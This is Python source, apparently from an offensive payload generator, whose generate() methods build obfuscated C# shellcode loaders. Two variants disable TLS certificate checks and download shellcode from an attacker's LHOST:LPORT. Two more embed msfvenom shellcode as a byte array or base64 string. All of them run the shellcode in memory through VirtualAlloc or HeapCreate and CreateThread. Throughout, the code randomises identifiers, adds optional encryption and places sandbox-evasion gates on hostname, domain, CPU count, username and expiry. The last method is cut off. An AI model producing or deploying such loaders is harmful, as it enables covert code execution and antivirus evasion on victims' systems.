def generate(self) -> None:
    """Build C# source for an HTTPS download-and-inject program and store it on self.

    The emitted program contains, in order: a certificate-validation callback that
    returns true unconditionally, a random-string helper, an 8-bit checksum test,
    a URI generator that searches for a path passing that test, a WebClient-based
    downloader, an injection routine (VirtualAlloc- or heap-based, selected by
    INJECT_METHOD), and Main(). Main() wraps the download/inject call in the
    environment gates enabled by EXPIRE_PAYLOAD, HOSTNAME, DOMAIN, PROCESSORS and
    USERNAME; the kernel32 P/Invoke declarations are appended last. When USE_ARYA
    is "y" the finished source is run through encryption.arya().

    All identifiers in the generated code come from evasion_helpers.randomString().
    Result is written to self.payload_source_code; nothing is returned.
    """
    # imports and namespace setup
    payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices;\n"
    payload_code += "namespace %s { class %s {\n" % (evasion_helpers.randomString(), evasion_helpers.randomString())

    # code for the randomString() function
    randomStringName = evasion_helpers.randomString()
    bufferName = evasion_helpers.randomString()
    charsName = evasion_helpers.randomString()
    # alphabet is shuffled once here and reused (re-shuffled) for randChars below
    t = list("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789")
    random.shuffle(t)
    chars = ''.join(t)

    # logic to turn off certificate validation: the callback ignores every
    # argument and returns true, so any server certificate is accepted
    validateServerCertficateName = evasion_helpers.randomString()
    payload_code += "private static bool %s(object sender, System.Security.Cryptography.X509Certificates.X509Certificate cert,System.Security.Cryptography.X509Certificates.X509Chain chain,System.Net.Security.SslPolicyErrors sslPolicyErrors) { return true; }\n" % (validateServerCertficateName)

    # code for the randomString() method: fills a char[s] from the shuffled alphabet
    payload_code += "static string %s(Random r, int s) {\n" % (randomStringName)
    payload_code += "char[] %s = new char[s];\n" % (bufferName)
    payload_code += "string %s = \"%s\";\n" % (charsName, chars)
    payload_code += "for (int i = 0; i < s; i++){ %s[i] = %s[r.Next(%s.Length)];}\n" % (bufferName, charsName, charsName)
    payload_code += "return new string(%s);}\n" % (bufferName)

    # code for the checksum8() function: true when the sum of the char codes
    # modulo 0x100 equals 92 (the %% is a literal '%' after Python formatting)
    checksum8Name = evasion_helpers.randomString()
    payload_code += "static bool %s(string s) {return ((s.ToCharArray().Select(x => (int)x).Sum()) %% 0x100 == 92);}\n" % (checksum8Name)

    # code for the genHTTPChecksum() function: up to 64 attempts of a 3-char base
    # plus one trailing char, returning the first path that passes checksum8();
    # "9vXU" is the fallback when none is found
    genHTTPChecksumName = evasion_helpers.randomString()
    baseStringName = evasion_helpers.randomString()
    randCharsName = evasion_helpers.randomString()
    urlName = evasion_helpers.randomString()
    random.shuffle(t)
    randChars = ''.join(t)
    payload_code += "static string %s(Random r) { string %s = \"\";\n" % (genHTTPChecksumName, baseStringName)
    payload_code += "for (int i = 0; i < 64; ++i) { %s = %s(r, 3);\n" % (baseStringName, randomStringName)
    payload_code += "string %s = new string(\"%s\".ToCharArray().OrderBy(s => (r.Next(2) %% 2) == 0).ToArray());\n" % (randCharsName, randChars)
    payload_code += "for (int j = 0; j < %s.Length; ++j) {\n" % (randCharsName)
    payload_code += "string %s = %s + %s[j];\n" % (urlName, baseStringName, randCharsName)
    payload_code += "if (%s(%s)) {return %s;}}} return \"9vXU\";}" % (checksum8Name, urlName, urlName)

    # code for getData() function
    getDataName = evasion_helpers.randomString()
    strName = evasion_helpers.randomString()
    webClientName = evasion_helpers.randomString()
    sName = evasion_helpers.randomString()
    payload_code += "static byte[] %s(string %s) {\n" % (getDataName, strName)
    # installs the always-true callback defined above, disabling TLS certificate checks
    payload_code += "ServicePointManager.ServerCertificateValidationCallback = %s;\n" % (validateServerCertficateName)
    payload_code += "WebClient %s = new System.Net.WebClient();\n" % (webClientName)
    # fixed request headers sent with every download
    payload_code += "%s.Headers.Add(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\");\n" % (webClientName)
    payload_code += "%s.Headers.Add(\"Accept\", \"*/*\");\n" % (webClientName)
    payload_code += "%s.Headers.Add(\"Accept-Language\", \"en-gb,en;q=0.5\");\n" % (webClientName)
    payload_code += "%s.Headers.Add(\"Accept-Charset\", \"ISO-8859-1,utf-8;q=0.7,*;q=0.7\");\n" % (webClientName)
    payload_code += "byte[] %s = null;\n" % (sName)
    # responses shorter than 100000 bytes are discarded; WebException is swallowed,
    # so the caller sees null (or a partially assigned array) on any failure
    payload_code += "try { %s = %s.DownloadData(%s);\n" % (sName, webClientName, strName)
    payload_code += "if (%s.Length < 100000) return null;}\n" % (sName)
    payload_code += "catch (WebException) {}\n"
    payload_code += "return %s;}\n" % (sName)

    # code for the inject() function to inject shellcode
    injectName = evasion_helpers.randomString()
    sName = evasion_helpers.randomString()
    funcAddrName = evasion_helpers.randomString()
    hThreadName = evasion_helpers.randomString()
    threadIdName = evasion_helpers.randomString()
    pinfoName = evasion_helpers.randomString()
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        # 0x1000 / 0x40 are MEM_COMMIT / PAGE_EXECUTE_READWRITE; the buffer is
        # copied in and run on a new thread, then waited on with 0xFFFFFFFF (INFINITE)
        payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName)
        payload_code += " if (%s != null) {\n" % (sName)
        payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (funcAddrName, sName)
        payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (sName, funcAddrName, sName)
        payload_code += " IntPtr %s = IntPtr.Zero;\n" % (hThreadName)
        payload_code += " UInt32 %s = 0;\n" % (threadIdName)
        payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName)
        payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (hThreadName, funcAddrName, pinfoName, threadIdName)
        payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % (hThreadName)
    elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
        # 0x00040000 is HEAP_CREATE_ENABLE_EXECUTE, 0x00000008 is HEAP_ZERO_MEMORY;
        # the doubled braces in the .format() strings emit literal '}' characters
        payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName)
        payload_code += " if (%s != null) {\n" % (sName)
        payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(pinfoName, sName)
        payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(funcAddrName, pinfoName, sName)
        payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(funcAddrName, sName, sName)
        payload_code += ' UInt32 {} = 0;\n'.format(threadIdName)
        payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(hThreadName, funcAddrName, threadIdName)
        payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(hThreadName)

    # code for Main() to launch everything
    sName = evasion_helpers.randomString()
    randomName = evasion_helpers.randomString()
    # curlyCount tracks how many environment-gate blocks were opened so they can
    # be closed after the inject call
    curlyCount = 0
    payload_code += "static void Main(){\n"
    if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x":
        RandToday = evasion_helpers.randomString()
        RandExpire = evasion_helpers.randomString()
        # Create Payload code: date gate comparing DateTime.Today with Today + EXPIRE_PAYLOAD days
        payload_code += '\t' * curlyCount + 'DateTime {} = DateTime.Today;\n'.format(RandToday)
        payload_code += '\t' * curlyCount + 'DateTime {} = {}.AddDays({});\n'.format(RandExpire, RandToday, self.required_options["EXPIRE_PAYLOAD"][0])
        payload_code += '\t' * curlyCount + 'if ({} < {}) {{\n'.format(RandExpire, RandToday)
        # Add a tab for this check
        curlyCount += 1
    if self.required_options["HOSTNAME"][0].lower() != "x":
        # machine-name gate (case-insensitive substring match)
        payload_code += '\t' * curlyCount + 'if (System.Environment.MachineName.ToLower().Contains("{}")) {{\n'.format(self.required_options["HOSTNAME"][0].lower())
        # Add a tab for this check
        curlyCount += 1
    if self.required_options["DOMAIN"][0].lower() != "x":
        # domain gate: requires the user domain name to differ from the machine name
        payload_code += '\t' * curlyCount + 'if (System.Environment.MachineName.ToLower() != System.Environment.UserDomainName.ToLower()) {\n'
        # Add a tab for this check
        curlyCount += 1
    if self.required_options["PROCESSORS"][0].lower() != "x":
        # processor-count gate
        payload_code += '\t' * curlyCount + 'if (System.Environment.ProcessorCount > {}) {{\n'.format(self.required_options["PROCESSORS"][0])
        # Add a tab for this check
        curlyCount += 1
    if self.required_options["USERNAME"][0].lower() != "x":
        # username gate: splits DOMAIN\user on the backslash and tests the second part
        rand_user_name = evasion_helpers.randomString()
        rand_char_name = evasion_helpers.randomString()
        payload_code += '\t' * curlyCount + 'string {} = System.Security.Principal.WindowsIdentity.GetCurrent().Name;\n'.format(rand_user_name)
        payload_code += '\t' * curlyCount + "string[] {} = {}.Split('\\\\');\n".format(rand_char_name, rand_user_name)
        payload_code += '\t' * curlyCount + 'if ({}[1].Contains("{}")) {{\n\n'.format(rand_char_name, self.required_options["USERNAME"][0])
        # Add a tab for this check
        curlyCount += 1
    # Random is seeded from the clock; the URL is https://LHOST:LPORT/<checksum path>
    payload_code += "Random %s = new Random((int)DateTime.Now.Ticks);\n" % (randomName)
    payload_code += "byte[] %s = %s(\"https://%s:%s/\" + %s(%s));\n" % (sName, getDataName, self.required_options["LHOST"][0], self.required_options["LPORT"][0], genHTTPChecksumName, randomName)
    # the trailing '}' closes Main(); the loop below closes each gate block
    payload_code += "%s(%s);}\n" % (injectName, sName)
    while (curlyCount != 0):
        payload_code += '\t' * curlyCount + '}'
        curlyCount -= 1

    # get 12 random variables for the API imports (17 for the heap variant);
    # both declaration strings end with "}}" closing the class and namespace
    r = [evasion_helpers.randomString() for x in range(12)]
    y = [evasion_helpers.randomString() for x in range(17)]
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11])
    elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
        payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16])

    # optional whole-source transformation; what arya() does is defined elsewhere
    if self.required_options["USE_ARYA"][0].lower() == "y":
        payload_code = encryption.arya(payload_code)

    self.payload_source_code = payload_code
    return
def generate(self) -> None:
    """Build C# source for a plain-HTTP download-and-inject program and store it on self.

    Same layout as the HTTPS variant but without the certificate callback: a
    random-string helper, an 8-bit checksum test, a URI generator, a WebClient
    downloader, an injection routine chosen by INJECT_METHOD, and Main(). The
    environment gates inside Main() are produced by gamemaker.senecas_games(self),
    which also hands back the number of blocks it opened so they can be closed
    here. The kernel32 P/Invoke declarations are appended last; USE_ARYA == "y"
    routes the finished source through encryption.arya().

    Identifiers come from helpers.randomString(). Writes self.payload_source_code
    and returns None.
    """
    # imports and namespace setup
    payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices;\n"
    payload_code += "namespace %s { class %s {\n" % (helpers.randomString(), helpers.randomString())

    # code for the randomString() function
    randomStringName = helpers.randomString()
    bufferName = helpers.randomString()
    charsName = helpers.randomString()
    # alphabet shuffled once here; reshuffled again below for randChars
    t = list("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789")
    random.shuffle(t)
    chars = ''.join(t)
    payload_code += "static string %s(Random r, int s) {\n" % (randomStringName)
    payload_code += "char[] %s = new char[s];\n" % (bufferName)
    payload_code += "string %s = \"%s\";\n" % (charsName, chars)
    payload_code += "for (int i = 0; i < s; i++){ %s[i] = %s[r.Next(%s.Length)];}\n" % (bufferName, charsName, charsName)
    payload_code += "return new string(%s);}\n" % (bufferName)

    # code for the checksum8() function: sum of char codes modulo 0x100 must be 92
    checksum8Name = helpers.randomString()
    payload_code += "static bool %s(string s) {return ((s.ToCharArray().Select(x => (int)x).Sum()) %% 0x100 == 92);}\n" % (checksum8Name)

    # code for the genHTTPChecksum() function: 64 tries of a 3-char base plus one
    # trailing char; first path passing checksum8() is returned, else "9vXU"
    genHTTPChecksumName = helpers.randomString()
    baseStringName = helpers.randomString()
    randCharsName = helpers.randomString()
    urlName = helpers.randomString()
    random.shuffle(t)
    randChars = ''.join(t)
    payload_code += "static string %s(Random r) { string %s = \"\";\n" % (genHTTPChecksumName, baseStringName)
    payload_code += "for (int i = 0; i < 64; ++i) { %s = %s(r, 3);\n" % (baseStringName, randomStringName)
    payload_code += "string %s = new string(\"%s\".ToCharArray().OrderBy(s => (r.Next(2) %% 2) == 0).ToArray());\n" % (randCharsName, randChars)
    payload_code += "for (int j = 0; j < %s.Length; ++j) {\n" % (randCharsName)
    payload_code += "string %s = %s + %s[j];\n" % (urlName, baseStringName, randCharsName)
    payload_code += "if (%s(%s)) {return %s;}}} return \"9vXU\";}" % (checksum8Name, urlName, urlName)

    # code for getData() function
    getDataName = helpers.randomString()
    strName = helpers.randomString()
    webClientName = helpers.randomString()
    sName = helpers.randomString()
    payload_code += "static byte[] %s(string %s) {\n" % (getDataName, strName)
    payload_code += "WebClient %s = new System.Net.WebClient();\n" % (webClientName)
    # fixed request headers sent with every download
    payload_code += "%s.Headers.Add(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\");\n" % (webClientName)
    payload_code += "%s.Headers.Add(\"Accept\", \"*/*\");\n" % (webClientName)
    payload_code += "%s.Headers.Add(\"Accept-Language\", \"en-gb,en;q=0.5\");\n" % (webClientName)
    payload_code += "%s.Headers.Add(\"Accept-Charset\", \"ISO-8859-1,utf-8;q=0.7,*;q=0.7\");\n" % (webClientName)
    payload_code += "byte[] %s = null;\n" % (sName)
    # responses under 100000 bytes are discarded; WebException is swallowed
    payload_code += "try { %s = %s.DownloadData(%s);\n" % (sName, webClientName, strName)
    payload_code += "if (%s.Length < 100000) return null;}\n" % (sName)
    payload_code += "catch (WebException) {}\n"
    payload_code += "return %s;}\n" % (sName)

    # code for the inject() function to inject shellcode
    injectName = helpers.randomString()
    sName = helpers.randomString()
    funcAddrName = helpers.randomString()
    hThreadName = helpers.randomString()
    threadIdName = helpers.randomString()
    pinfoName = helpers.randomString()
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        # 0x1000 / 0x40 are MEM_COMMIT / PAGE_EXECUTE_READWRITE; 0xFFFFFFFF is INFINITE
        payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName)
        payload_code += " if (%s != null) {\n" % (sName)
        payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (funcAddrName, sName)
        payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (sName, funcAddrName, sName)
        payload_code += " IntPtr %s = IntPtr.Zero;\n" % (hThreadName)
        payload_code += " UInt32 %s = 0;\n" % (threadIdName)
        payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName)
        payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (hThreadName, funcAddrName, pinfoName, threadIdName)
        payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % (hThreadName)
    elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
        # 0x00040000 is HEAP_CREATE_ENABLE_EXECUTE, 0x00000008 is HEAP_ZERO_MEMORY;
        # doubled braces in .format() strings are literal '}' characters
        payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName)
        payload_code += " if (%s != null) {\n" % (sName)
        payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(pinfoName, sName)
        payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(funcAddrName, pinfoName, sName)
        payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(funcAddrName, sName, sName)
        payload_code += ' UInt32 {} = 0;\n'.format(threadIdName)
        payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(hThreadName, funcAddrName, threadIdName)
        payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(hThreadName)

    # code for Main() to launch everything
    sName = helpers.randomString()
    randomName = helpers.randomString()
    curlyCount = 0
    payload_code += "static void Main(){\n"
    # gate code and its open-block count come from gamemaker; the initial
    # curlyCount = 0 is overwritten here — presumably senecas_games returns
    # (code, number of opened blocks), judging by the closing loop below
    payload_code2, curlyCount = gamemaker.senecas_games(self)
    payload_code = payload_code + payload_code2
    # clock-seeded Random; URL is http://LHOST:LPORT/<checksum path>
    payload_code += "Random %s = new Random((int)DateTime.Now.Ticks);\n" % (randomName)
    payload_code += "byte[] %s = %s(\"http://%s:%s/\" + %s(%s));\n" % (sName, getDataName, self.required_options["LHOST"][0], self.required_options["LPORT"][0], genHTTPChecksumName, randomName)
    # trailing '}' closes Main(); the loop closes each gate block
    payload_code += "%s(%s);}\n" % (injectName, sName)
    while (curlyCount != 0):
        payload_code += '\t' * curlyCount + '}'
        curlyCount -= 1

    # get random variables for the API imports; both declaration strings end
    # with "}}" closing the class and namespace
    r = [helpers.randomString() for x in range(12)]
    y = [helpers.randomString() for x in range(17)]
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11])
    elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
        payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16])

    # optional whole-source transformation defined in the encryption module
    if self.required_options["USE_ARYA"][0].lower() == "y":
        payload_code = encryption.arya(payload_code)

    self.payload_source_code = payload_code
    return
def generate(self) -> None:
    """Build C# source with the shellcode embedded as a byte-array literal and store it on self.

    Shellcode is either produced by self.shellcode.generate() (payload_type then
    follows msfvenompayload / payload_choice / 'custom') or taken verbatim from
    self.cli_shellcode, and is rewritten from "\\x.." escape text into a
    "0x..,0x.." list. The generated program declares the kernel32 P/Invokes
    first, then Main() containing the environment gates (EXPIRE_PAYLOAD, HOSTNAME,
    DOMAIN, PROCESSORS, USERNAME) and the VirtualAlloc- or heap-based execution
    path chosen by INJECT_METHOD. USE_ARYA == "y" runs the source through
    encryption.arya().

    Writes self.payload_source_code (and may set self.payload_type); returns None.
    """
    # Generate the shellcode
    if not self.cli_shellcode:
        Shellcode = self.shellcode.generate(self.cli_opts)
        if self.shellcode.msfvenompayload:
            self.payload_type = self.shellcode.msfvenompayload
        elif self.shellcode.payload_choice:
            self.payload_type = self.shellcode.payload_choice
            # reset so the choice is not reused on a later generate() call
            self.shellcode.payload_choice = ''
        # assume custom shellcode
        else:
            self.payload_type = 'custom'
    else:
        Shellcode = self.cli_shellcode

    # "\x41\x42" -> split on backslash gives ['', 'x41', 'x42'] -> "0x41,0x42"
    Shellcode = "0" + ",0".join(Shellcode.split("\\")[1:])

    # randomize all our variable names, yo'
    namespaceName = evasion_helpers.randomString()
    className = evasion_helpers.randomString()
    bytearrayName = evasion_helpers.randomString()
    funcAddrName = evasion_helpers.randomString()
    hThreadName = evasion_helpers.randomString()
    threadIdName = evasion_helpers.randomString()
    pinfoName = evasion_helpers.randomString()
    # counts open blocks; reaches 2 for namespace+class before any gate is added
    num_tabs_required = 0

    # get 12 random variables for the API imports (17 for the heap variant)
    r = [evasion_helpers.randomString() for x in range(12)]
    y = [evasion_helpers.randomString() for x in range(17)]

    # required syntax at the beginning of any/all payloads
    payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices;\n"
    payload_code += "namespace %s { class %s {\n" % (namespaceName, className)
    # P/Invoke declarations go before Main() here; unlike the download variants
    # these strings do not close the class/namespace — the brace loop at the end does
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % (r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11])
    elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
        payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % (y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16])

    payload_code += "static void Main() {\n"
    num_tabs_required += 2

    if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x":
        RandToday = evasion_helpers.randomString()
        RandExpire = evasion_helpers.randomString()
        # Create Payload code: date gate comparing DateTime.Today with Today + EXPIRE_PAYLOAD days
        payload_code += '\t' * num_tabs_required + 'DateTime {} = DateTime.Today;\n'.format(RandToday)
        payload_code += '\t' * num_tabs_required + 'DateTime {} = {}.AddDays({});\n'.format(RandExpire, RandToday, self.required_options["EXPIRE_PAYLOAD"][0])
        payload_code += '\t' * num_tabs_required + 'if ({} < {}) {{\n'.format(RandExpire, RandToday)
        # Add a tab for this check
        num_tabs_required += 1
    if self.required_options["HOSTNAME"][0].lower() != "x":
        # machine-name gate (case-insensitive substring match)
        payload_code += '\t' * num_tabs_required + 'if (System.Environment.MachineName.ToLower().Contains("{}")) {{\n'.format(self.required_options["HOSTNAME"][0].lower())
        # Add a tab for this check
        num_tabs_required += 1
    if self.required_options["DOMAIN"][0].lower() != "x":
        # domain gate: user domain name must differ from the machine name
        payload_code += '\t' * num_tabs_required + 'if (System.Environment.MachineName.ToLower() != System.Environment.UserDomainName.ToLower()) {\n'
        # Add a tab for this check
        num_tabs_required += 1
    if self.required_options["PROCESSORS"][0].lower() != "x":
        # processor-count gate
        payload_code += '\t' * num_tabs_required + 'if (System.Environment.ProcessorCount > {}) {{\n'.format(self.required_options["PROCESSORS"][0])
        # Add a tab for this check
        num_tabs_required += 1
    if self.required_options["USERNAME"][0].lower() != "x":
        # username gate: DOMAIN\user split on the backslash, second element tested
        rand_user_name = evasion_helpers.randomString()
        rand_char_name = evasion_helpers.randomString()
        payload_code += '\t' * num_tabs_required + 'string {} = System.Security.Principal.WindowsIdentity.GetCurrent().Name;\n'.format(rand_user_name)
        payload_code += '\t' * num_tabs_required + "string[] {} = {}.Split('\\\\');\n".format(rand_char_name, rand_user_name)
        payload_code += '\t' * num_tabs_required + 'if ({}[1].Contains("{}")) {{\n\n'.format(rand_char_name, self.required_options["USERNAME"][0])
        # Add a tab for this check
        num_tabs_required += 1

    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        # 0x1000 / 0x40 are MEM_COMMIT / PAGE_EXECUTE_READWRITE (see the
        # commented-out constants line below); 0xFFFFFFFF is INFINITE. The
        # closing '}' on the last line ends Main().
        payload_code += "byte[] %s = {%s};" % (bytearrayName, Shellcode)
        payload_code += "UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (funcAddrName, bytearrayName)
        payload_code += "Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (bytearrayName, funcAddrName, bytearrayName)
        payload_code += "IntPtr %s = IntPtr.Zero; UInt32 %s = 0; IntPtr %s = IntPtr.Zero;\n" % (hThreadName, threadIdName, pinfoName)
        payload_code += "%s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (hThreadName, funcAddrName, pinfoName, threadIdName)
        payload_code += "WaitForSingleObject(%s, 0xFFFFFFFF);}\n" % (hThreadName)
        # payload_code += "private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\n"
    elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
        # 0x00040000 is HEAP_CREATE_ENABLE_EXECUTE, 0x00000008 is HEAP_ZERO_MEMORY;
        # the doubled "}}" in the last .format() string emits the '}' that ends Main()
        rand_heap = evasion_helpers.randomString()
        rand_ptr = evasion_helpers.randomString()
        rand_var = evasion_helpers.randomString()
        payload_code += '\t' * num_tabs_required + "byte[] %s = {%s};\n" % (bytearrayName, Shellcode)
        payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(rand_heap, bytearrayName)
        payload_code += '\t' * num_tabs_required + 'UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(rand_ptr, rand_heap, bytearrayName)
        payload_code += '\t' * num_tabs_required + 'RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(rand_ptr, bytearrayName, bytearrayName)
        payload_code += '\t' * num_tabs_required + 'UInt32 {} = 0;\n'.format(rand_var)
        payload_code += '\t' * num_tabs_required + 'IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(hThreadName, rand_ptr, rand_var)
        payload_code += '\t' * num_tabs_required + 'WaitForSingleObject({}, 0xFFFFFFFF);}}\n'.format(hThreadName)

    # close every gate block plus the class and namespace (the initial +2)
    while (num_tabs_required != 0):
        payload_code += '\t' * num_tabs_required + '}'
        num_tabs_required -= 1

    # optional whole-source transformation defined in the encryption module
    if self.required_options["USE_ARYA"][0].lower() == "y":
        payload_code = encryption.arya(payload_code)

    self.payload_source_code = payload_code
    return
<br>def generate(self) -> None:
    """Build C# source that carries the shellcode as a base64 string and store it on self.

    Shellcode is obtained exactly as in the embedded-array variant (generated or
    taken from self.cli_shellcode, then rewritten to "0x..,0x.." text) and is
    additionally base64-encoded with the latin-1 codec. The generated Main()
    decodes that string at runtime, splits it on ',' and parses each item with
    Convert.ToByte(item, 16) into a byte[], then executes it via the VirtualAlloc
    or heap path selected by INJECT_METHOD. Environment gates come from
    gamemaker.senecas_games(self). USE_ARYA == "y" runs the finished source
    through encryption.arya().

    Writes self.payload_source_code (and may set self.payload_type); returns None.
    """
    # Generate the shellcode
    if not self.cli_shellcode:
        Shellcode = self.shellcode.generate(self.cli_opts)
        if self.shellcode.msfvenompayload:
            self.payload_type = self.shellcode.msfvenompayload
        elif self.shellcode.payload_choice:
            self.payload_type = self.shellcode.payload_choice
            # reset so the choice is not reused on a later generate() call
            self.shellcode.payload_choice = ''
        # assume custom shellcode
        else:
            self.payload_type = 'custom'
    else:
        Shellcode = self.cli_shellcode

    # Base64 Encode Shellcode: "\x41\x42" -> "0x41,0x42" -> base64 text
    Shellcode = "0" + ",0".join(Shellcode.split("\\")[1:])
    Shellcode = base64.b64encode(bytes(Shellcode, 'latin-1')).decode('ascii')

    # randomize all our variable names, yo'
    namespaceName = evasion_helpers.randomString()
    className = evasion_helpers.randomString()
    bytearrayName = evasion_helpers.randomString()
    funcAddrName = evasion_helpers.randomString()
    shellcodeName = evasion_helpers.randomString()
    hThreadName = evasion_helpers.randomString()
    threadIdName = evasion_helpers.randomString()
    pinfoName = evasion_helpers.randomString()
